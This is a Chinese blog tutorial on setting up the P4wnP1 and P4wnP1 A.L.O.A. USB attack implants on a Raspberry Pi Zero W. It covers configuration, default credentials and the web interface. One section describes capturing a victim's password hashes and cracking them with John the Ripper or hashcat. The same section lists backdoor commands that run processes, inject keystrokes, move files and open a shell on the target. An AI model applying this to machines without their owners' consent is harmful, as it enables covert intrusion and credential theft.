<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5"><title>P4wnP1全家桶安装及实战 | Asc0t6e</title><meta name="description" content="P4wnP1全家桶安装及实战"><meta name="author" content="Asc0t6e"><meta name="copyright" content="Asc0t6e"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin><link rel="preconnect" href="//busuanzi.ibruce.info"><meta name="twitter:card" content="summary"><meta name="twitter:title" content="P4wnP1全家桶安装及实战"><meta name="twitter:description" content="P4wnP1全家桶安装及实战"><meta name="twitter:image" content="https://gitee.com/asc0t6e/Random-img/raw/master/BlogCover/35.jpg"><meta property="og:type" content="article"><meta property="og:title" content="P4wnP1全家桶安装及实战"><meta property="og:url" content="https://www.ascotbe.com/2019/06/29/raspberry/"><meta property="og:site_name" content="Asc0t6e"><meta property="og:description" content="P4wnP1全家桶安装及实战"><meta property="og:image" content="https://gitee.com/asc0t6e/Random-img/raw/master/BlogCover/35.jpg"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>const autoChangeMode = '2'
var t = Cookies.get("theme");
if (autoChangeMode == '1'){
const isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
const isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
const isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

if (t === undefined){
  if (isLightMode) activateLightMode()
  else if (isDarkMode) activateDarkMode()
  else if (isNotSpecified || hasNoSupport){
    console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
    now = new Date();
    hour = now.getHours();
    isNight = hour < 6 || hour >= 18
    isNight ? activateDarkMode() : activateLightMode()
}
} else if (t == 'light') activateLightMode()
else activateDarkMode()


} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="https://www.ascotbe.com/2019/06/29/raspberry/"><link rel="prev" title="SQL Sever和Mysql的区别" href="https://www.ascotbe.com/2019/06/29/SQL%20Sever%E5%92%8CMysql%E7%9A%84%E5%8C%BA%E5%88%AB/"><link rel="next" title="Metasploit详解" href="https://www.ascotbe.com/2019/06/07/Metasploit%E8%AF%A6%E8%A7%A3/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://www.ascotbe.com/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: 'Snackbar.bookmark.title',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: true,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  isHome: false,
  isPost: true
  
}</script><meta name="generator" content="Hexo 4.2.1"></head><body><canvas class="fireworks"></canvas><header> <div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">Asc0t6e</a></span><span class="toggle-menu pull_right close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/Loophole"><i class="fa-fw fa fa-link"></i><span> Loophole</span></a></div><div class="menus_item"><a class="site-page" href="/Taylor_Swift"><i class="fa-fw fa fa-link"></i><span> Taylor_Swift</span></a></div><div class="menus_item"><a class="site-page" href="/Links/"><i class="fa-fw fa fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> About</span></a></div></div></span></div></header><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/avatar.jpeg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">96</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/Loophole"><i class="fa-fw fa fa-link"></i><span> Loophole</span></a></div><div class="menus_item"><a class="site-page" href="/Taylor_Swift"><i class="fa-fw fa fa-link"></i><span> Taylor_Swift</span></a></div><div class="menus_item"><a class="site-page" href="/Links/"><i class="fa-fw fa fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> About</span></a></div></div></div><div id="mobile-sidebar-toc"><div class="toc_mobile_headline">目录</div><div class="sidebar-toc__content"></div></div></div><div id="body-wrap"><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true">     </i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"></div></div></div><main id="content-outer"><div id="top-container" style="background-image: url(https://gitee.com/asc0t6e/Random-img/raw/master/Blog/35.jpg)"><div id="post-info"><div id="post-title"><div class="posttitle">P4wnP1全家桶安装及实战</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 发表于 2019-06-29<span class="post-meta__separator">|</span><i class="fa fa-history fa-fw" aria-hidden="true"></i> 更新于 2020-04-15</time><div class="post-meta-wordcount"><div class="post-meta-pv-cv"><span><i class="fa fa-eye post-meta__icon fa-fw" aria-hidden="true"> </i>阅读量:</span><span id="busuanzi_value_page_pv"></span></div></div></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><blockquote>
<p>前言</p>
</blockquote>
<p>今天想用自己<code>USB</code>入侵设备的时候，发现<code>WIFI</code>密码给忘了</p>
<p>重装的时候发现自己没有写详细过程！呸！！最后只能删了重写写过。</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/51.jpg?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229171357370" class="fancybox"><img alt="image-20191229171357370" title="image-20191229171357370" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/51.jpg?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<blockquote>
<p>写在前头血的教训</p>
</blockquote>
<ul>
<li><p>树莓派没有那么容易坏不用买第二个！！</p>
</li>
<li><p>网上的<code>wpa_supplicant.conf</code>开启<code>WIFI</code>我试了N次都没成功过</p>
</li>
<li><p><code>USB</code>转接头一定要买不需要焊接(别买<code>Zero Quick Plug Bad USB</code></p>
</li>
<li><p>树莓派<code>Zero W</code>自带<code>WIFI</code>所以别再买<code>WIFI</code>模块了</p>
</li>
<li><p>装完<code>P4wnP1</code>切记重启不要直接拔掉会导致开不了机</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo shutdown -r now</span><br></pre></td></tr></table></figure></div>


</li>
</ul>
<blockquote>
<p>成品图</p>
</blockquote>
<p>硬件需求</p>
<ul>
<li>树莓派<code>Zero W</code></li>
<li><code>USB</code>接头</li>
<li><code>TF</code>卡一张</li>
</ul>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/50.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229171357370" class="fancybox"><img alt="image-20191229171357370" title="image-20191229171357370" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/50.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<blockquote>
<p>通过网线连接树莓派</p>
</blockquote>
<ul>
<li><p>首先在<code>config.txt</code>最末行处换行添加如下代码，打开<code>usb</code>网卡模式</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dtoverlay=dwc2</span><br></pre></td></tr></table></figure></div>
</li>
<li><p>其次在<code>cmdline.txt</code>文件中找到<code>rootwait</code>字段，并在其后面空格添加如下信息，在打开系统时开启<code>usb</code>网卡模式。</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">modules-load=dwc2,g_ether</span><br></pre></td></tr></table></figure></div>
</li>
<li><p>然后把<code>TF</code>卡插入树莓派连接电脑，在串口中会出现串口<code>COM</code>，并且会弹出<code>RNDIS</code>未连接，接着右键点击我的电脑-&gt;管理-&gt;设备管理器中找到在<code>COM</code>(端口通信)右击<a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/%E6%A0%91%E8%8E%93%E6%B4%BEUSB%E8%BF%9E%E6%8E%A5%E9%A9%B1%E5%8A%A8.zip" target="_blank" rel="noopener">更新驱动</a>后使用如下命令即可连接</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh pi@raspberrypi.local</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/3.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="1576640437876" class="fancybox"><img alt="1576640437876" title="1576640437876" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/3.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
</ul>
<blockquote>
<p>树莓派换源</p>
</blockquote>
<p>这里有两个源需要换</p>
<ul>
<li><p>修改软件更新源，位置<code>/etc/apt/sources.list</code></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#换为阿里云的源</span></span><br><span class="line">deb http://mirrors.aliyun.com/raspbian/raspbian/ jessie main non-free contrib rpi</span><br></pre></td></tr></table></figure></div>
</li>
<li><p>修改系统更新源，位置<code>/etc/apt/sources.list.d/raspi.list</code></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#换位edu的源,不然安装P4wnP1的时候更新系统需要等个把小时</span></span><br><span class="line">deb http://mirrors.ustc.edu.cn/archive.raspberrypi.org/debian/ stretch main ui</span><br></pre></td></tr></table></figure></div>

</li>
</ul>
<blockquote>
<p>设置<code>wifi</code></p>
</blockquote>
<ul>
<li><p>在命令行中输入</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo raspi-config</span><br></pre></td></tr></table></figure></div>
</li>
<li><p>然后选择<code>Network Options</code></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/5.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="1576658634228" class="fancybox"><img alt="1576658634228" title="1576658634228" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/5.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
<li><p>选择<code>WI-FI</code></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/6.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="1576658657250" class="fancybox"><img alt="1576658657250" title="1576658657250" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/6.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
<li><p>选择自己国家语言编码</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/7.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="1576658563761" class="fancybox"><img alt="1576658563761" title="1576658563761" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/7.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
<li><p>最后输入<code>ssid</code>和<code>passwd</code>即可连接成功，注:<code>ssid</code>为你<code>wifi</code>的名字，<code>passwd</code>为你的<code>wifi</code>密码    <a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/4.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="1576640479699" class="fancybox"><img alt="1576640479699" title="1576640479699" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/4.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
</ul>
<blockquote>
<p>更换<code>pip</code>源</p>
</blockquote>
<p>修改文件位置<code>/etc/pip.conf</code></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[global]</span><br><span class="line">timeout = 6000</span><br><span class="line">index-url = http://mirrors.aliyun.com/pypi/simple/</span><br><span class="line">extra-index-url=https://www.piwheels.org/simple/</span><br><span class="line">[install]</span><br><span class="line">use-mirrors = <span class="literal">true</span></span><br><span class="line">mirrors = http://mirrors.aliyun.com/pypi/simple/</span><br><span class="line">trusted-host = mirrors.aliyun.com</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p>安装<code>P4wnP1</code></p>
</blockquote>
<ul>
<li><p>从<code>Github</code>下载项目</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#下载</span></span><br><span class="line">git <span class="built_in">clone</span> https://github.com/mame82/P4wnP1.git</span><br><span class="line"><span class="built_in">cd</span> P4wnP1</span><br><span class="line"><span class="comment">#安装</span></span><br><span class="line">./install.sh</span><br></pre></td></tr></table></figure></div>
</li>
<li><p>安装成功后连接<code>WIFI</code>名为<code>P4wnP1</code></p>
</li>
<li><p>初始密码是<code>MaMe82-P4wnP1</code></p>
</li>
<li><p>再用<code>putty</code>连接<code>172.24.0.1</code>端口<code>22</code></p>
</li>
<li><p>打开配置文件:</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo vim P4wnP1&#x2F;setup.cfg</span><br></pre></td></tr></table></figure></div>
</li>
<li><p>配置文件的各个功能的作用<a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/raspberry%20.txt" target="_blank" rel="noopener">详情点我</a></p>
</li>
<li><p>如果使用了<code>Payload</code>后你修改的<code>WIFI</code>还是没变可以去<code>P4wnP1/payloads</code>里面修改文件(因为优先加载<code>payload</code>里面的设置</p>
</li>
<li><p>原始设置+原始<code>Payload</code><br><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/1.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="1571724375513" class="fancybox"><img alt="1571724375513" title="1571724375513" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/1.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
<li><p>修改过设置+修改过<code>Payload</code><br><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/2.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="1571724375513" class="fancybox"><img alt="1571724375513" title="1571724375513" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/2.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
<li><p>连接靶机</p>
<p>输入<code>FireStage1</code>当出现<code>client connect</code>字样时说明连接成功</p>
</li>
<li><p>破解密码</p>
<ul>
<li><p>设置完<code>payloads</code>后插上电脑，当受害者输入密码的时候，树莓派会自己利用 <code>John the Ripper</code>模块进行破解</p>
</li>
<li><p>密码文件在这个位置</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;P4wnP1&#x2F;collected</span><br></pre></td></tr></table></figure></div>
</li>
<li><p>如果是强密码可以使用<code>hashcat</code></p>
</li>
<li><p>可以参考<a href="https://hashcat.net/wiki/doku.php?id=mask_attack" target="_blank" rel="noopener">使用文档</a></p>
</li>
</ul>
</li>
<li><p><code>shell</code>命令</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#结束给定的远程进程</span></span><br><span class="line">KillProc </span><br><span class="line"><span class="comment">#结束给定远程客户端</span></span><br><span class="line">KillClient</span><br><span class="line"><span class="comment">#创建进程，打开计算器的命令为： CreateProc calc</span></span><br><span class="line">CreateProc</span><br><span class="line"><span class="comment">#发送键盘脚本</span></span><br><span class="line">SendDuckyScript</span><br><span class="line"><span class="comment">#发送鼠标脚本</span></span><br><span class="line">SendMouseScript</span><br><span class="line"><span class="comment">#发送“ABC”键盘输入</span></span><br><span class="line">sendkeys ABC</span><br><span class="line"><span class="comment">#下载文件到树莓派</span></span><br><span class="line">download</span><br><span class="line"><span class="comment">#上传文件到主机</span></span><br><span class="line">upload</span><br><span class="line"><span class="comment">#以靶机的身份访问控制台</span></span><br><span class="line">shell</span><br></pre></td></tr></table></figure></div>

</li>
</ul>
<p>详细命令可以参考<a href="https://p4wnp1.readthedocs.io/en/latest/Payload-Subfolder/Backdoor-Subfolder/Backdoor-Commands/" target="_blank" rel="noopener">官方文档</a></p>
<blockquote>
<p>安装<code>P4wnP1 A.L.O.A.</code></p>
</blockquote>
<p>由于<code>P4wnP1</code>的可用性太低了，再加上作者已经放弃了那个项目，所以把原来的改成了<code>P4wnP1 A.L.O.A.</code></p>
<p>本想网上找点资料参考下怎么使用的结果找了半天都没找到使用的文章，官方的文档又是英文的还没有安装教程（原谅我英语菜的抠脚），就只能自己慢慢摸索，刚开始是从<code>Github</code>下载项目到树莓派上然后使用<code>./install</code>来安装，结果疯狂报错，下载了<code>Go</code>语言依赖还是疯狂报错然后我就咕咕了4天(其实是自闭了4天）直到某天逛<code>YouTube</code>的时候看到了某个老哥的安装教程，才有了这部分文章</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/25.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228184531505" class="fancybox"><img alt="image-20191228184531505" title="image-20191228184531505" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/25.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>其实不需要从<code>Github</code>上下载源码安装，作者已经为你打包好了镜像，只需要刷入<code>TF</code>卡就可以了</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#下载img包</span><br><span class="line">https:&#x2F;&#x2F;github.com&#x2F;mame82&#x2F;P4wnP1_aloa&#x2F;releases&#x2F;download&#x2F;v0.1.0-alpha2&#x2F;kali-linux-v0.1.0-alpha2-rpi0w-nexmon-p4wnp1-aloa.img.xz</span><br></pre></td></tr></table></figure></div>

<p>接下来只需要连上电脑，打开<code>WiFi</code>就会出现这个界面</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/26.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228192655446" class="fancybox"><img alt="image-20191228192655446" title="image-20191228192655446" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/26.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>接着连接该<code>WiFi</code>密码为<code>MaMe82-P4wnP1</code> 访问<code>http://172.24.0.1:8000/</code>就能进入<code>web</code>端了，推荐电脑连接网线然后用<code>WiFi</code>连接树莓派的<code>WiFi</code>这样既可以上网又可以访问<code>web</code>端</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/27.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228194055248" class="fancybox"><img alt="image-20191228194055248" title="image-20191228194055248" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/27.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/28.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228194439877" class="fancybox"><img alt="image-20191228194439877" title="image-20191228194439877" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/28.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>通过<code>172.24.0.1</code>的<code>22</code>端口进行<code>ssh</code>连接，默认用户名<code>root</code>密码<code>toor</code></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/29.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228194643075" class="fancybox"><img alt="image-20191228194643075" title="image-20191228194643075" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/29.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<blockquote>
<p><code>web</code>使用体验</p>
</blockquote>
<ul>
<li><p><code>USB settings</code></p>
<p>可以对供应商ID、制作者ID、生产商名称、序列号、产品名字进行自定义设置</p>
<p>并且可以对键盘、鼠标、存储设备（模拟<code>USB</code>闪存驱动器或<code>CD-ROM</code>）、序列化接口、<code>RBDIS</code>（<code>Windows</code>上的<code>USB</code>以太网）、<code>CDC ECM</code>（针对<code>UNIX Linux OSX</code>的<code>USB</code>网络）进行选择</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/30.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228200031658" class="fancybox"><img alt="image-20191228200031658" title="image-20191228200031658" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/30.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
<li><p><code>WiFi settings</code></p>
<p>可以对<code>WIFI</code>名称和密码、信道、加密方式、是否隐藏<code>SSID</code>（这个一般必开）、所在国家、工作模式（<code>AP</code>或客户端）</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/31.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228200811638" class="fancybox"><img alt="image-20191228200811638" title="image-20191228200811638" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/31.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>修改好点击<code>store</code>来把配置保存在树莓派中然后点击 <code>DEPLOY STORED</code>即可</p>
<p>切记密码长度要大于8位不然会导致设置失败</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/32.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228203809367" class="fancybox"><img alt="image-20191228203809367" title="image-20191228203809367" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/32.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
</ul>
<ul>
<li><p><code>Bluetooth Settings</code></p>
<p>蓝牙模块感觉没有<code>WiFi</code>来的高效，这块就暂时不多逼逼了，我直接给它关了</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/33.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228203935828" class="fancybox"><img alt="image-20191228203935828" title="image-20191228203935828" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/33.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
<li><p><code>Network Settings</code></p>
<p>对网络和<code>DHCP</code>进行的一些设置</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/34.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228204400151" class="fancybox"><img alt="image-20191228204400151" title="image-20191228204400151" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/34.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
<li><p><code>Trigger Action</code></p>
<p>触发机制，通过某项事件或者操作触发一项或者多项操作</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/35.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228210645760" class="fancybox"><img alt="image-20191228210645760" title="image-20191228210645760" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/35.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>触发条件有：开始服务、树莓派连接到目标、树莓派从目标断开、<code>WIFI</code>连接成功、加入现有的<code>WIFI</code>、<code>DHCP</code>、<code>GPIO</code>输入、从SSH登入树莓派</p>
<p>触发后的操作：写入日志、运行<code>bash</code>脚本、启动<code>HIDscript</code>、加载和部署模板、在<code>GPIO</code>上设置输出还可以设置要加载的模板和模板类型</p>
<p>如果勾选了<code>One shot</code>的话那就只会执行一次</p>
